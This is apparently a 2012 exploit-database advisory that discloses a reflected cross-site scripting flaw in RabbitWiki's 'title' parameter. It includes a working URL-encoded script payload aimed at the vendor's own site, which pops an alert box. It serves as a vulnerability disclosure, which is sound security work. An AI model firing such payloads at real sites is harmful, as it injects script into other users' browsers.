# Exploit Title: RabbitWiki Cross Site Scripting # Date: 9.02.2012 # Author: Sony # Software Link: http://www.rustyspigot.com/webmasters/s/RabbitWiki/ # Web Browser : Mozilla Firefox # Blog : http://st2tea.blogspot.com # PoC: http://st2tea.blogspot.com/2012/02/rabbitwiki-cross-site-scripting.html .................................................................. Simple Wiki. index.php?title=[our xss is here] Demo: http://www.rustyspigot.com/webmasters/s/RabbitWiki/index.php?title=%22%3E\%3Cscript%3Ealert%28%22rabbit%20says:hello%22%29%3C/script%3E http://4.bp.blogspot.com/-p9gnAXoNB0I/TzPILgWo2fI/AAAAAAAAAc0/yiDtrL-Rm88/s1600/rabbit.JPG .................................................................. InSecurity.Ro Because we care, we're security aware!